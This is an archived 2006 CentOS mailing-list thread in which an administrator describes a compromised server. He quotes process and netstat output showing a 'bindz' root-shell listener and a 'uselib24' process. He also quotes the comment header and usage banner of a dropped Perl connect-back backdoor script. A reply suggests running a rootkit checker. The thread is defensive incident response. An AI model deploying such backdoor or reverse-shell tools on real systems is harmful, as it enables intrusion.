[CentOS] Uselib24/bindz - owned!
Rick Philbrick
rickphilbrick at gmail.com
Thu May 4 05:31:56 UTC 2006
Hi,
Well thats telling. So do you have chkroot-kit installed? Although
you know you've got to have a root-kit on there. Anyway, it may help
narrow your search of the directories and the changes within.
-rickp
On 5/3/06, Nick <list at everywhereinternet.com> wrote:
> So pretty sure one of my boxes has been owned. Just wanted some advise
> on what to do next. Obviously, i'll need to nuke the fecker and start
> over but it would be really nice to find out how they got in as its a
> CentOS 4.3 which is bang up to date.
>
> So i found:
>
> PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND
> 7052 apache 25 0 27320 5348 8 R 99.0 0.5 736:52 0 uselib24
>
> [root at box tmp]# netstat -lnp |more
> Active Internet connections (only servers)
> Proto Recv-Q Send-Q Local Address Foreign
> Address State PID/Program name
> tcp 0 0 0.0.0.0:32768
> 0.0.0.0:* LISTEN 3012/rpc.statd
> tcp 0 0 127.0.0.1:32769
> 0.0.0.0:* LISTEN 3138/xinetd
> tcp 0 0 0.0.0.0:66
> 0.0.0.0:* LISTEN 3124/sshd
> tcp 0 0 0.0.0.0:9865
> 0.0.0.0:* LISTEN 7031/bindz
> tcp 0 0 0.0.0.0:3306
> 0.0.0.0:* LISTEN 14534/mysqld
> tcp 0 0 0.0.0.0:111
> 0.0.0.0:* LISTEN 2993/portmap
> tcp 0 0 0.0.0.0:80
> 0.0.0.0:* LISTEN 7031/bindz
> tcp 0 0 0.0.0.0:113
> 0.0.0.0:* LISTEN 3138/xinetd
> tcp 0 0 0.0.0.0:21
> 0.0.0.0:* LISTEN 3578/vsftpd
> tcp 0 0 127.0.0.1:25
> 0.0.0.0:* LISTEN 10707/sendmail: acc
> tcp 0 0 0.0.0.0:443
> 0.0.0.0:* LISTEN 7031/bindz
>
> Bindz.... hmm. telnetting to the port gave me a root shell - nice. My
> firewall scripts should block that port but i don't know if they're
> working now :(
>
> contents of /var/tmp was:
>
> -rwxrwxr-x 1 apache apache 19429 Jan 10 16:20 bindz
> -rw-r--r-- 1 apache apache 2100 Jan 8 21:32 dc.txt
> -rwxrwxr-x 1 apache apache 479843 Aug 3 2005 uselib24
>
> dc.txt started:
>
> #!/usr/bin/perl
> use IO::Socket;
> #IRAN HACKERS SABOTAGE Connect Back Shell
> #code by:LorD
> #We Are :LorD-C0d3r-NT
> #Email:LorD at ihsteam.com
> #
> #lord at SlackwareLinux:/home/programing$ perl dc.pl
> #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE
> ==--
> #
> #Usage: dc.pl [Host] [Port]
> #
> #Ex: dc.pl 127.0.0.1 2121
> #lord at SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
> #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE
> ==--
> #
> #[*] Resolving HostName
> #[*] Connecting... 127.0.0.1
> #[*] Spawning Shell
> #[*] Connected to remote host
>
> i might e-mail him and thank him.
>
> So what next?
>
>
>
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> http://lists.centos.org/mailman/listinfo/centos
>
More information about the CentOS
mailing list